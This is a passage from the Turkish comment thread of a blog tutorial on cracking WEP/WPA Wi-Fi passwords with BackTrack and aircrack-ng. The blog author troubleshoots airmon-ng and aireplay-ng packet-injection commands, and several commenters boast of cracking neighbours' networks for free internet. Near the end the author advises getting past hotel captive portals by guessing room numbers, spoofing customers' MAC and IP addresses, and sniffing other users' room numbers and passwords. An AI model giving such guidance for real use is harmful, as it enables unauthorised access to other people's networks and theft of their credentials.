  hocam bir sorum var herşeyi güzel gidiyor fakat datada hiç yükselme olmuyor hep 0 da kalıyor ne yapmam lazım laptoptan baglanıyorum acer marka paket toplyor 100 bin lere 200 binlere geliyor ama data hiç artış olmuyor hep 0 simdiden tesekkürler

 62. #73 BahadıR tarafından, tarihinde

  İyi günLeR.Şu tarz bi problemım vaR.
  Chipset Atheros ar9285
  Driver ath9k

  airmon-ng start wlan0 yazdıgımda
  ath9k[phy0] ioctl(SIOCSIFFLAGS) failed: Unknown error 132
  (monitor mode enabled mon0)

  ve airodump-ng -c 11 mon0 da direk olarak
  ioctl(SIOCSIFFLAGS) failed: Unknown error 132
  hatasını alıyoruM.

  Wireless Windowsta(windows 7 ) calısmasına ragmen bcktrck4 r2 de çalışmıyoR. Aktif edilemıyor.Bu konu hakkındaki fikirlerinizi bekliyorum teşekkürleR.

  • #74 BahadıR tarafından, tarihinde

   Sorun anlayamadıgım bi şekilde çözüldü 😀 tşkrler.

 63. #75 isa tarafından, tarihinde

  hocam ben airodump-ng mon0 komutunu girince unkown error 132 hatasını alıyorum. yorumlarda bi arkadaşta da aynı problem çıkmış ama bi şekilde halolmuş. chipset atheros ath9k ne yapmam gerekiyor saygılarıımla

 64. #76 Yusuf tarafından, tarihinde

  hocam şifreyi kırdım kırmasına ama şifreyi ascii olarak vermiyor. yani hex kodunun yanında ascii kodu yok(16:12:40…..) şeklinde rakamlar veriyor. Bunları ascii’ye çevirmek istediğimde ise örneğin 16 yı ascii olarak karşılığını bulamıyorum. yardımlarınızı bekliyorum.

  • #77 Murat tarafından, tarihinde

   Hex olarak kalmasında bir problem yok. Benim tavsiyem giriş yaparken şifreyi hex olarak yazmanız. Çünkü ascii yazarken bazı karakterlerde dediğiniz gibi sorun çıkabilir.
   Tabi aradaki iki noktalarıyı kaldırmayı unutmayın.
   A1B2C3D4E5 şeklinde yazarsanız bağlanacaktır.

  • #78 Yusuf tarafından, tarihinde

   hocam çok teşekkür ederim. Dediğiniz gibi yaptım oldu.

 65. #79 adem kara tarafından, tarihinde

  backtrack için bi link var mı indirebileceğimiz hocam tşkler

 66. #80 arif B. tarafından, tarihinde

  merhaba,

  backtrac ı win7 de başlattım. konsoldan kontrol ettim kablosuz bağdaştırıcımıda sorunsuz olarak görüyor ancak
  “airmon-ng start eth1” bölümünde sizinki gibi “mon0” gelmiyor. orda yazan şu şekilde “wl (monitor mode enabled)”

  böyle olunca diğer adıma geçemiyorum :S
  bu konuda yardımcı olabilirseniz çok memnun olurum.

  • #81 Murat tarafından, tarihinde

   iwconfig komutunun çıktısında kablosuz ağ kartınız eth1 olarak mı gözüküyor?
   Yanlışlıkla ethernet kartınızı dinleme moduna geçirmeye çalışıyor olabilir misiniz?

   • #82 arif B. tarafından, tarihinde

    evet iwconfig komutu sonucunda ” lo, eth0 ve eth1″ çıktıları ekrana geliyor. eth1’de modem bilgileri çıkıyor. daha sonra;
    ifconfig eth1 ile mac adresine ulaşıyorum. devamında
    airmon-ng start eth1 yazınca “Found 1 processes…” ile devam eden yer çıkmıyor sadece altta “Interfaca , Chipset, Driver” bilgilerini gösteriyor ve “(monitor mode enabled)” yazıyor. yani “on mon0” gibi ifade çıkmıyor.

    birşey daha dikkatimi çekti, şifresi bildiğim kendi modemime blacktrack’ı kullanarak bağlantıda kuramıyorum. modemi görüyor, şifreyide yazıyorum ama connect yazınca biraz bekliyor ve hata alıyorum.

    acaba sorun;
    -windows7 olarak açtığım için mi ?
    -blacktrack wireless bağdaştırıcısını eksik mi tanıyor ?
    -farklı bir yöntem mi kullanmam gerekiyor ?

 67. #83 arif B. tarafından, tarihinde

  selamlar tekrardan..
  pardus 2011 yükledim hocam onunla deneyeyim birde diye. wireless kartını falan tanıttım hatta kendi modemime bağlanabiliyorum. o konuda sorun yok yani..

  ancak konsol’dan “airmon-ng start eth1” yazınca “bash: airmon-ng: komut yok” uyarısını veriyor.

  bu neden olabilir ?

  • #84 Murat tarafından, tarihinde

   WPA kırma sayfasındaki yorumlarda da soran olmuştu. Bildiğim kadarıyla Pardus’un içinde aircrack-ng ve beraberindeki programlar gelmiyor. Bunları paket yöneticisinden yüklemeniz gerekiyor. PiSi’den aratırsanız bulup yükleyebilirsiniz.

 68. #85 arif B. tarafından, tarihinde

  murat hocam peki black track ile sistemi açınca
  “airmon-ng start eth1” yazınca neden sadece
  “(monitor mode enabled)” çıkıyor (devamındaki on mon0 yok)

  ayrıca bazı komutlarla blacktracckta kendi wirelessime bağlandım sorunsuzca. ama işte airmon ile olunca niye eksik çıktı alıyorum bir türlü anlayamadım..

  etrafta onlarca web şifreli internet var ama bir türlü şu işi beceremedim 🙂

  yardımcı olabilirseniz çok memnun olurum 🙂

 69. #86 aytac tarafından, tarihinde

  daha önce arkadaşlar sormuştu ancak ben çözüm üretemedim. şimdi benim masaüstünde windows yüklü değil. format attım ve direk backtrack4 ten çalıştırdım. herşey read packets kısmına kadar sorunsuz. bu arada gülenyüz kısımlı association succesful kısmaıda sorunsuz devamlı çalışıyor konsolda. ctrl-z yapmadığım için sanırım. son konsolda read packets sayısı 500000 leri buldu ama hala use this packets yazısı gelmedi. kartım tüm kablosuz ağları da görüyor. sorun ne olabilir :(((

 70. #87 aytac tarafından, tarihinde

  şuanda benim gönderdiğim sahte packets sayısı ve son konsol penceresindeki read olan packets sayısı hala artmasına rağmen sonuç yok.. use this packets sorusu yok… #data=0 :((

  • #88 aytac tarafından, tarihinde

   arkadaşlar yokmu cevap verecek… murat hoca nerdesin :((((

   • #89 Murat tarafından, tarihinde

    Okul,iş ve sınav yoğunluğundan dolayı bu aralar çabuk cevap veremiyorum.
    Bende o paket çıkması için çok beklediğimi bilirim. Hatta çıkmadığı için 1 saat yavaş yavaş paket topladığım bile oldu.

    • #90 aytac tarafından, tarihinde

     tşk ederim hocam cvp için. o zaman bizde mecbur beklicez use this packet sorusu gelsin diye ne yapalım…..

 71. #91 arif B. tarafından, tarihinde

  galiba benim ethernet kartıyla alakalı bir uyum sorunu var bu blacktrack’ın 🙂 acer ve toshiba iki laptopda denedim ve şifre çözmeyi başardım (aramızda kalsın şuanda beleş netten yazıyorum)

  fakat aklıma takıldı, 11. kanaldan buldum şifreyi ama apartmanda bir web ile şifrelenmiş wireless bağlantı var. bu ise kanal 1′den yayın yapıyor. (blacktrack öyle gösteriyor)
  neyse 11 yazdığım yerleri 1 olarak yazdım iş data toplamaya geldiğinde 5′e kadar data toplayabildi. işi abarttım apartmanda modemin olduğu kata çıktık iki arkadaşla onun bağlantısı iyi olarak (3/4) çekiyor ama bendeki data artmıyor. düşünüyorum nerede eksik birşeyler yapmış olabilirim diye ama bir türlü bulamadım..

  şimdi sıra wpa çözmede. asıl olan o. çünkü etraf hep wpa ile şifrelenmiş bağlantılarla dolu. bir tane web çözdüm ama evin içinde çeksin diye dolaşmadığım yer kalmadı..

  en sonra çare iki bavulu üst üste koydum be laptopu üstüne koydu 🙂

  idareten böyle bakalım ilerde nasıl birşey yapacağıum 🙂

  bu arada murat hocam bilgiler için teşekkürler..

  buda biraz tebessüm olsun bende sizlere 😀
  link: http://img269.imageshack.us/img269/9694/01032011.jpg

  • #92 Murat tarafından, tarihinde

   Resim için teşekkürler. Gerçekten çok yaratıcı olmuş. Kocaman bir gülümseme oldu bende 🙂

   Bende yeri geliyor laptop elimde her noktayı dolaşıyorum 🙂

 72. #93 uğur tarafından, tarihinde

  ben burdaki yazılanlar gibi yaptım ama gel gelelim yeni konsol açamıyorum. bende direk komut sayfası gibi açılıyor yani sizdeki gibi session edit view bookmark … gibi sekmeler yok. yani direk sayfa olarak açık öyle pencere olarak değil. ne yapmam gerekiyor

 73. #94 uğur tarafından, tarihinde

  uğur :ben burdaki yazılanlar gibi yaptım ama gel gelelim yeni konsol açamıyorum. bende direk komut sayfası gibi açılıyor yani sizdeki gibi session edit view bookmark … gibi sekmeler yok. yani direk sayfa olarak açık öyle pencere olarak değil. ne yapmam gerekiyor

  resmini de çektim http://img825.imageshack.us/i/grnt0020.jpg/

 74. #96 efe tarafından, tarihinde

  Merhaba Hocam ;

  aireplay-ng -1 2 -o 10 -q 10 -a web mac -h benim mac mon0
  yazım onayladıgımda komut hatası verıyor ve help menusune yonlendırıyor yardım please
  şimdiden teşekkürler.

  • #97 arif B. tarafından, tarihinde

   satırın doğrusu

   aireplay-ng -1 2 -o 10 -q 10 -a modemmac -h pcmac mon0

   şeklinde olmalı.

  • #98 Murat tarafından, tarihinde

   Doğru yazmışsınız aslında. Belki mac adresini yazarken bir yanlışlık olmuştur.

 75. #99 engin tarafından, tarihinde

  paket toplamak için ağda biri olması lazım derken illa kendimiz mi trafik oluşturmamız gerekiyor?
  yani internetin sahibi kendi bilgisayarından internere giriyorsa bu iş olmaz mı? yani paket çoğalmaz mı?

 76. #100 Murat tarafından, tarihinde

  Hayır. Başka birisi wireless ile bağlı ise ve veri gönderip alıyorsa zaten ağda trafik var demektir. Sizin oluşturmanıza gerek yok.

 77. #101 yusuf tarafından, tarihinde

  Hocam iki sorum olacak. Birincisi paketleri backtrack ile toplayıp harddiske kaydederek windows üzerinde çalışan aircrack ile bu paketleri kırabilirmiyiz. İkincisi paket toplarken modeme bağlı kimse olmadığı için kendim trafik oluşturmaya çalışıyorum aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF………….. komutunu girdikten sonra gelen soruya y diyorum fakat #Data kısmında bir kaç paket toplandıktan sonra paket toplama işlemi duruyor #Data kısmı 10-15 pakette kalıyor kodda veya mac adreslerinde bir hata olduğunu düşünmüyorum üstelik modemede yakınım bunun nedeni ne olabilir. En kısa zamanda cevaplarınızı bekliyorum. Teşekkürler.

  • #102 canuri tarafından, tarihinde

   dediğini yapim dedim paketleri windowsa koydum baya bi taradı fln sonrada failed dedi ama belki benden kaynaklanıyodur bilmiyorum

 78. #103 kemal tarafından, tarihinde

  hocam bu programı bulamadım yardımcı olurmusunz (:

 79. #104 canuri tarafından, tarihinde

  valla eline sağlık bu sabah internet borcundan dolayı kapanmıştı dediklerini harfien yaptım sadece şu –ivs olayı olmadı bende onu sildim desktopa cap kismet diye dosyalar açtı 70000 paket topladım dediklerini yaptım 1 snde şifreyi buldu şuan mis gibi giriyo yarın 4 tane daha web şifreli var onlarıda halledicem sonra wpa yazını okuyup ona bakim yapabilecekmiyim

 80. #105 uğur tarafından, tarihinde

  murat bey söylediklerinizi aynen yaptım ama blacktrack ekranı sizinki gibi olmuyor. bt yi sizin verdiğiniz linkten indirdim ama olmuyo sizinki gibi. yeni bi tane daha açın dediğiniz yere kadar geliyorum ama ordan sonrası gelmiyo. yeni açamıyorum
  http://img291.imageshack.us/i/grnt0021.jpg/

  • #106 Murat tarafından, tarihinde

   Çok erken yazmışsınız 🙂
   Biraz daha bekledikten sonra yüklenme işlemleri devam edecek. DOS ortamına benzer bir şekilde yazı yazmanızı isteyen kısım çıkacak. Biraz daha bekleyin 🙂

 81. #107 emin tarafından, tarihinde

  : ) adam ifadesi çıkmıyor ve karşı taraf 88.kanalda siz 11. kanaldasınız gibi birşey yazıyar bu nedenlede data artmıyor ve şifreyi bulmuyor 11 gördügüm talimatları 8 olarak değiştirdim çözüm olmadı ne yapmalıyım

  teşekkürler…

  • #108 emin tarafından, tarihinde

   88 değil 8 olacaktı

  • #109 Murat tarafından, tarihinde

   Modemle ilgili olabilir. Ağda birileri varken paket toplamayı deneyebilirsiniz.

 82. #110 uğur tarafından, tarihinde

  Murat :
  Çok erken yazmışsınız 🙂
  Biraz daha bekledikten sonra yüklenme işlemleri devam edecek. DOS ortamına benzer bir şekilde yazı yazmanızı isteyen kısım çıkacak. Biraz daha bekleyin 🙂

  bekledikten sonra sizinki gibi yeni açma imkanım olcak mı?

  • #111 Murat tarafından, tarihinde

   Bekledikten sonra komut satiri gelecek. Komut satirinda startx yazarak KDE ortamina giris yapacaksiniz. Windows benzeri bir goruntu olacak. Pencereler, baslat cubugu vb. Bu durumda bir kac tane konsol penceresi acip anlatilanlari uygulayabilirsiniz.

 83. #112 canuri tarafından, tarihinde

  tp-link usb adaptörü görmüyor ama d-link520 pcı adaptörü görüyor

 84. #113 Hakan tarafından, tarihinde

  bilen bilmeyen herkes wephack yapıo bu aralar. Murat bey siz de millete öğretiyorsunuz. Yaptığınız şey ayıptır. Milletin wireless’ını kullanmak ayıptır. Hele ki kotalı olduğunu düşünürsek?

  • #114 Murat tarafından, tarihinde

   Hakan bey, öncelikle yorumunuz için teşekkür ederim. Fakat burdaki bilgileri kendi yararınıza olacak şekilde kullanabilirsiniz. Daha öncede söylemiştim: Size nasıl saldırıldığını bilirseniz korunabilirsiniz.
   Bir de şu açıdan bakabiliriz. Ben burada bilgimi paylaşıyorum. Mezara götürmek ya da saklamak gibi bir niyetim yok. Kimseye “herkesin şifresini kırın, kotalarını sömürün” gibi bir söylemimde yok.
   Ayıp mı değil mi kısmına gelirsek: Bilmemek ayıp değil öğrenmemek ayıp 😉

 85. #115 çağatay tarafından, tarihinde

  aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0

  komutunu girdiğimde sizindediğiniz gibi y tuşuna bas filan çıkmıyor paket toplamayo 1000000 kadar yapıyor bıraksam daha devem edecek kare data 15 yukarı çıkmıyor,wifi de gayet iyi butun kanalları 100 çekiyor,gülen surat hiç bitmiyor 5 saat beklerdim cpu 4 çekirdek ekran kartım hd 4870,

 86. #116 çağatay tarafından, tarihinde

  wifi hıgh power wnu686hn 300mbps linux desteki,
  bizim burda okadar çok ağ varki,inan anlatımından 1 tane bile kıramadım. tırafik işide yaş gibi geliyor,her sitede ayrı şekılde anlatılıyor kafam karıştı.gülen suratlardan bıktım ağlamak istiyorum artık.imkanın olursa birde video koyarsan minnettar olurum,sadece hırs yaptım bir ağ kırdım ama sallamasyon 12345678 yaptım kırıldı,şu an bu sayede bağlanıyorum şifreyi değiştirmeden bunu öğrenmem lağzım.

 87. #117 uğur tarafından, tarihinde

  Murat :
  Bekledikten sonra komut satiri gelecek. Komut satirinda startx yazarak KDE ortamina giris yapacaksiniz. Windows benzeri bir goruntu olacak. Pencereler, baslat cubugu vb. Bu durumda bir kac tane konsol penceresi acip anlatilanlari uygulayabilirsiniz.

  yaklaşık bi 15 dk bekledim hep o ekranda kaldı hiç bi ilerleme olmadı 🙁
  bu arada memleketime gelip gitmişsin hoşgeldinz.umarım beğenmişsinzdr

  • #118 Murat tarafından, tarihinde

   Tamamen şans eseri şöyle birşey buldum, deneyebilir misiniz?
   3-4 dk bekledikten sonra CTRL+X’e basın. Ekranda ^X yazacak. Ardından Enter tuşuna basın. İmleç alt satıra geçecek ve yükleme devam edecek.

   Ama neden böyle birşey var bilmiyorum. Biryerde takılıyor birşeyler ama ne bilmiyorum.

 88. #119 hakkı tarafından, tarihinde

  120000 oldu data bulamadı 🙁

 89. #120 hakkı tarafından, tarihinde

  660000 yaptım bu gün tık yok

  • #121 Erol tarafından, tarihinde

   bazı modemlerde sanal tarfik alış verişi olmuyormuş.
   hani kendimiş oluşturuyoruz yaa onu olurturmadan denemen lazım ama interneti kullanan biri olması lazım zaten al kısımda çıkıyorr varsa . he bide dua et data toplamak için bişey felan izlesin 🙂

 90. #122 Burak tarafından, tarihinde

  Öncelikle merhaba
  Birkaç Sorum olacak

  1-Backtrack 4 te exe ler neden çalışmıyor.
  2-Neden Video izlenemiyor.
  3-VMware ile neden wifi yi tanımıyor.(Boot edince tanıyor.)

  Şimdi den teşekkürler.

  • #123 Murat tarafından, tarihinde

   1- Linux işletim sistemi olduğu için windows’un yorumlayabildiği exe’leri çalıştıramazsınız. Linux’un çalıştırılabilir dosyaları çok farklı. Normal bir yazı dosyasına gerekli izinleri vererek çalıştırılabilir bir programcığa çevirebiliyorsunuz. Windows’un .bat dosyaları gibi. Bu konuda detaylı benimde detaylı bilgim yok. Driver ve program yüklemeleri zaten insanı çıldırtıyor. İşime yaradığı kadarını öğreniyorum bende 🙂

   2- Backtrack dağıtımının yapılış amacı ağ güvenliğini sağlamak ve testlerini yapmak olduğu için içinde video-müzik gibi kısımlar yok.

   3- VMware’in azizliği olabilir. Eskiden VMware kullanıyordum. Eğer ağa bağlıysam VMware kartımı görmüyordu. Önce ağdan bağlantımı kopartıp sanal makinaya takıyordum.

   Ben teşekkür ederim 🙂

 91. #124 cagdas tarafından, tarihinde

  bende nedense airmon yazisi cikmiyor wlan0 olarak modemin adi gozukuyor ama airmon-ng start wlan0 diyince sizde cikan en alt satir cikmiyor.
  interface chipset driver yazilari var en altta bende

  • #125 Fatma tarafından, tarihinde

   Benimki de aynen oyle oluyor sebebi nedir acaba

 92. #126 cagdas tarafından, tarihinde

  birde bende found 5 procesess diyor sizdeki gibi bir degil

 93. #127 Yusuf Gürbüz tarafından, tarihinde

  Vallahi tebrik ederim çok anlaşılır anlatmışsınız hocam. komutların ne işe yaradığını ayrı ayrı anlatmanız çok hoşuma gitti sadece ağ kırmak için değil bişeyler öğrenmek için çok güzel anlatmışsınız.

 94. #128 niksnob tarafından, tarihinde

  Hocam Merhaba. Backtrack kurulumu ile ilgili bir anlatımınız yok sanırım. bt4r2iso wm ware kurulumunu anlatan bir yazı yayınlar mısnız. Teşekkürler.

  • #129 Murat tarafından, tarihinde

   Backtrack ve Windows’u aynı anda kullanabileceğinizi anlattığım bir yazım var. VMware’i pek tavsiye etmiyorum aslında. Çünkü kendi Netbook’umda kablosuz ağ kartım içeriden USB şeklinde bağlı. Bu sayede VMware’da kullanabiliyorum. Fakat geçen gün normal bir laptopta VMware’i denemek istedim ama ağ kartını gösteremedim. Sanırım USB aygıtı olmadığı için kullanamadım. Başka bir yöntem deneyecek vaktim de yoktu.
   Açılışta direk Backtrack kullanmak daha iyi. Tanıdı tanımadı gibi sorunlar en aza iniyor.

   http://murat.cesmecioglu.net/windows-ve-linux-birlikte-kullanma-dual-boot

 95. #130 sayit tarafından, tarihinde

  Hocam merhabalar, Wireless şifre kırma üzerine yapmış olduğun açıklama o kadar güzel ki. Dediklerini uygulayarak, 3 saatte 6 tane web şifresi kırdım. Hele birtanesi 3 dakika sürdü. 6.000 ivs le hallettim. Eline sağlık. Key found yazısını gördüğümdeki mutluluğu anlatamam. Açıkçası bu kadar kolay yapacağımı zannetmiyordum. 🙂

 96. #131 sefa tarafından, tarihinde

  Hocam. Anlattığınız üzere, backtrack 4 finali, dvd ye yazarak birçok wireless kırmıştım. Fakat şimdi dvd bozuldu. Tekrar indirdim.Kaydettim. indirmede kaydetmede hiçbir sorun yok. birkaç dvd ye kaydettim. ama çalışmıyor. Acaba nero da kaydederken dikkat etmemiz gereken nokta mı var. İndirdiğim bt4 winrar şeklinde ve içerisinde 4 dosya var. bilgisayarı yeniden başlatınca otomatik başlamıyor. windows başlıyor.

 97. #132 prof tarafından, tarihinde

  mon0 is on channel -1, but the AP uses channel 6

  modeme paket yollamak için komutu verdiğimde yukarıdaki gibi benim kartımın kanalı 1 modeminki 6 diyor. çözemediğim nokta kendi kartımın kanalını nasıl 1 den 6ya çevireceğim?

 98. #133 erol tarafından, tarihinde

  abicim wallaha kırdım.. 😀 süpersin.. ama şurda hep gata yapıyormusum deneme-01.ivs diye kayıt edip açıyorduk yaa kendi deneme-02 diye kaydetmiş bende komuyu yazarken 2 yi kuyllandım 50000 geçen paket toplamışş açtığım andada kırdı. suan kırdım netten yazıyorum sana.. 🙂

 99. #134 CSH tarafından, tarihinde

  merhaba ben yeni kaltıldım aranıza sayfada anlatılanların aynen uyguladım fakat benim wireless ataptörümü görmüyorum linux ne yapmam lazım 🙁 phılps snu6500

 100. #135 blood tarafından, tarihinde

  AR9271 cipsetini taanıdıgı soylenıyor ama tanımıyor nasıl diriverini yükleyebilirim tanıtabilirim yardım edebilirmisiniz

 101. #136 ahmet tarafından, tarihinde

  merhaba murat abi ben bilgisayarıma bt cd sini kurdum fakat açılışta logınve passwor var logın yazısına root kelimesini yazabiliyorum fakat şifre yerine hiç bireşey yazmıyor bt 4 denmi diye sandım bt5 i yükledim yine aynı sorun devam ediyor ama direk cd den açılıyor yükleyince o sorunu veriyor.abi bide şunu desteklermi şifre kırmada airties wireless networks/rt-206v11tt 1.1.5 desteklemesse driverini yükleyebilirmiyim ceveaplarınız için şimdiden teşekkürler

 102. #137 kaan baran tarafından, tarihinde

  hocam ellerıne saglık ben daha yenı basladım… musaıt oldugunda bıkac sey sorucam maille… tekrar tesekkur ederım emeüne sağlık kolay gelsın…

  • #138 MrT tarafından, tarihinde

   Hoşgeldiniz aramıza 🙂
   Konuyla ilgili ise yorum olarak sorabilirsiniz. Böylece aynı şeyi merak edenlere yardımcı oluruz.

 103. #139 Musa tarafından, tarihinde

  Hocam peki bu işlemleri gerçekleştirirkin bilgisayara ek bir gereç gerekitormu şifre
  kırmak için yoksa sadece verdiğniz komut ve talimatlara uyarakta kırabiliyormuyuz

  • #140 Murat tarafından, tarihinde

   Eğer kablosuz ağ kartınız varsa başka bişeye gerek yok. Tabi birde backtrack’ın sizin kartınızı tanıması gerekiyor.

 104. #141 Musa tarafından, tarihinde

  blood :AR9271 cipsetini taanıdıgı soylenıyor ama tanımıyor nasıl diriverini yükleyebilirim tanıtabilirim yardım edebilirmisiniz

 105. #142 Musa tarafından, tarihinde

  Tamam hocam ama kablosuz ağ kartı dediğniz wirless mi oluyo?

 106. #143 mahdur tarafından, tarihinde

  windows 7 kullanıyorum hep seyirciyim :(((

 107. #144 Serdar tarafından, tarihinde

  komşunun modeminde benim yarattığım trafif IV oluşturmuyor datalar artıyor ancak ıvler artmıyo bu sebeple onun internete girmesi gerekiyor onlar da pek internete girmediği için bir iki saatte anca 2000 iv’ye ulaşabiliyorum daha sonra windowsa geçmem gerektiği için işlem yarıım kalıyor. benim sorum farklı zamanda oluşturduğumuz (topladığımız) ivleri birleştirmemiz mümkünd müdür? mesela bi seferde 10bin bi seferde 20bin bi seferde de 10bin olmak üzere 3 tane iv dosyamız var bu 3ünü kullanarak çözmek mümkün müdür

  • #145 Murat tarafından, tarihinde

   Bilmiyorum ama fikriniz güzelmiş. Belki vardır. Eğer bulabilirsem nasıl kullanıldığını anlatırım.

   • #146 Serdar tarafından, tarihinde

    sonunda kırdım kendi yarattığım sanal trafik yeterli oldu 10-15 dk içinde kırdım şifreyi elinize sağlık teşekkürler

 108. #147 Alper tarafından, tarihinde

  Hocam dediklerinizin hepsini tek tek yaptim yalniz 3,5 saat gecmesine rağmen data sayim 1100 ancak oldu ve cok agir ilerliyor bunun sebebi nedir ?..tesekkurler,saygilar.

 109. #148 erhan tarafından, tarihinde

  2.000.000 üzerinde paket topladığım halde kıramıyorum, sorun ne olabilir acaba?

  • #149 Serdar tarafından, tarihinde

   o olay bende de oluyor bazı modemlerde bizim manipülasyonla yarattığımız data iv oluşturmuyor bu sebeple milyonlarca paket olsa da bu paketler iv siz olduğu için bir işe yaramıyor sizde internete girerek onların kendilerinin data oluşturması için bekleyeceksiniz başka şansınız yok ben de aynı sorunu yaşıyorum şuan

 110. #150 Kagan tarafından, tarihinde

  Öncelikle böyle bir eğitsel hazırladığınız için çok teşekkür ederim. IT konularıyla ilgili bilgilerin kendi dilimizde olması beni ve umarım birçok insanı mutlu ediyor. Ben BackTrack’i LiveCD’siyle kullandım ve ara sıra yavaş çalışmasına rağmen bir sorun çıkarmadı. Acaba bu yöntemin benim bilmediğim bir dezavantajı var mıdır?
  Teşekkürler.

  • #151 Murat tarafından, tarihinde

   LiveCD’den çalıştırmanın yavaşlık dışında bir dezavantajı yok. Dikkatli kullanıp yanlışlıkla bilgisayarınıza kurmadığınızı sürece birşey olmaz.
   Tabiki anlattıklarım dışında yaptıklarınınız kendi sorumluluğunuzda olduğunu söylememe gerek yok 🙂

 111. #152 SaLVa tarafından, tarihinde

  windows 7 kullanıyorum 1 aydır seyirciyim…windows 7 için bi anlatım yapabilirmisiniz..şimdiden teşekkürler…

  • #153 Murat tarafından, tarihinde

   Windows 7 için ikisini nasıl kullanılacağını çözdüm fakat harddiskinizde bölümlendirilmemiş alan olması gerekiyor. En kısa zamanda bir anlatım yapacağım.

 112. #154 Mert Can tarafından, tarihinde

  Ben de bir wep kırmayı deniyecektim ama trafik yoktu dediğiniz yaparak trafik oluşturdum baya paket geliyor ama data 1 de kalıyor.1 saat denedim yine data 1.Aircrack kullanarak kırayım dedim sadece 1 tane IV yakalamış diyor ve 5000 IV toplayarak tekrar deneyin diyor ama hiç data gelmiyor.nasıl dezeltebilirim şimdiden teşekkürler.

 113. #155 abdullah tarafından, tarihinde

  ben kendi modemim üzerinde deneyeyim dedim ama şu komutta takıldım birtürlü olmuyor
  aireplay-ng -1 2 -o 10 -q 10 -a mdm mac -h bnm mac mon0 dediğigim zaman such gibi bişeler çıkıyor anlamadım nerede hata yapıyorum bu arada kartım realtek rtl8187b acaba kartannmıdır modem ise airties rt 206

 114. #156 ahmet tarafından, tarihinde

  merhaba,

  verdiğin bilgiler için teşekkürler. backtrack 4 programını sağlıklı bir şekilde nereden indirebilirim. bilgi verirseniz sevinirim. iyi çalışmalar

 115. #157 yors tarafından, tarihinde

  merhaba hocam ben airmon-ng start eth1 yaziyorum fakat mon0 yazisi gelmyior resim de cetim http://i55.tinypic.com/2l9ocpw.jpg bt 5 kullaniyorum yardim ederseniz sevirnirim

 116. #158 yors tarafından, tarihinde

  merhaeba hocam bnm soruma hala cevap alamadım bu arada ben bt yi wm de kurdum acaba ondan wirless adaptorunu görmüypr olaabilirmi ..
  Atheros AR5B97 Wireless Network Adapter
  kullanıyorum..

  tekrardan paylaşım için teşekkür ediyorum :))

 117. #159 SaLVaToRe tarafından, tarihinde

  windows 7 anlatımınızı sabırsızlıkla bekliyorum…

 118. #160 yunus tarafından, tarihinde

  hocam bende en son aircrack-ng -a 1 kodunu yazıyorum sonra birz bekledikten sonra failed next tr with 100000 ıvs yazısını görüyorum

  • #161 Murat tarafından, tarihinde

   Yeteri kadar paket toplamamışsınız demektir. Biraz daha bekleyin. aircrack daha fazla paket geldikçe denemeye devam edecektir.

 119. #162 SaLVaToRe tarafından, tarihinde

  windows 7 anlatımınızı sabıesızlıkla bekliyoruz…..

 120. #163 oyuncu tarafından, tarihinde

  murat usta banada bi yardımcı olun bu airmon-ng start eth1 komutunda mon0 çıkmıyo ne yapmam gerekiyor şimdiden teşekürler

  • #164 Murat tarafından, tarihinde

   airmon-ng sonucunda nasıl bir çıktı alıyorsunuz?

 121. #165 Eray tarafından, tarihinde

  Merhaba Murat bey;
  Tüm dökümanları okuyarak backtrack 5’i vmware üzerine sorunsuz şekilde kurdum. WPA şifreleme bulunan kendi ağımda bir deneme yaptım. Handshake yakalayıp hazırladığım wordlist ile başarıyla çözdüm. 4-5 wpa ağdanda başarıyla handshake aldım 5 dakika içinde. Fakat ölçüp tartınca wpa konusu hobi olarak kalırsa daha iyi olacaktır diye düşünüyorum. Tüm dökümanlar için çok teşekkür ediyorum. Fakat tüm denemelerime rağmen wep ağ kırmayı başaramadım. Bu sabah bir wep ağı için çok uğraştım. Dökümanı eksiksiz olarak uyguladım. Son işlemle paketler hızla artıyor fakat data alanı artmıyor. Ki buradaki data sayısı iv sayısı diye biliyorum. Birkaç saat içinde 300000 civarında paket yakaladım fakat aircrack kontrolümde 3500 civarında toplam iv olduğunu gördüm. Daha sonrada yaptığım birkaç test sonucunda anladığım kadarıyla benim paket sayılarını arttırmamın bir etkisi olmamış. Wep ağındaki kullanıcı sayesinde 3500 iv sahibi olmuşum. Ki o kadar veride şifre çözmek için yeterli değil. Tahmini 25000 civarında iv gerekiyor sanırım. Şuanda ağı yine dinliyorum. Paket sayısı 95000. iv sayısı 0 ve ağda kimse yok. Paketler bana iv vermeyecekse toplamanın bi anlamı olmamalı. Biryerde yanlışmı yapıyorum. Birde son olarak backtrack sürümleri ile alakalı bir sorun yaşıyor olabilir miyim? Yardımcı olabilirseniz çok sevinirim.

 122. #166 Eray tarafından, tarihinde

  –ivs ibaresini silip cap olarak verileri yakalamayı denedim ve 3-4 dakikada ilk wep ağımı kırdım. ardından 10 dakikada 2 wep ağ daha kırmayı başardım. wep ska olan bir ağı aircrack dökümantasyonlarındakileri denediğim halde başarılı olamadım. şuanda ilk işim 7 veya 9 dbilık bir anten almak olacak. birde konu dışı olarak sormak istediğim birşey var. evimin çevresinde sayısız otel var. bu otellerin şifresiz hotspotları var. hotspotlara bağlandığınızda otel müşterileri için şifre oda no vb giriş ekranı geliyor. macden dinleme yapıp bağlı olan kişilerin mac adreslerini kendi mac adresime yazdığım halde giriş ekranını birtürlü aşamıyorum. bu konuda ne yapılabilir beni bilgilendirebilirseniz çok sevinirim.

  • #167 Murat Çeşmecioğlu tarafından, tarihinde

   Sadece oda numarası soruyorsa deneme yanılma ile girebilirsiniz fakat oda numarası ve şifre bilgisini ayrı ayrı istiyorsa işiniz zor, hatta imkansız.
   MAC filtrelemesi olduğunu sanmıyorum çünkü her müşterinin MAC adresini almak zahmetli bir iş. Yinede tedbir olarak MAC adresinizi değiştirip ve IP adresinizi müşterilerden biriyle aynı yapmayı deneyebilirsiniz. Yani IP adresini modemde almayın, elle girin.

   Her otelde mi bu sistem var? Başka otelleri deneyebilirsiniz.

   Yada ağa girebiliyorsanız -biraz sabır ve şansla- ağı dinleyerek kullanıcıların gönderdiği oda no ve şifreyi yakalayabilirsiniz.

   • #168 Eray tarafından, tarihinde

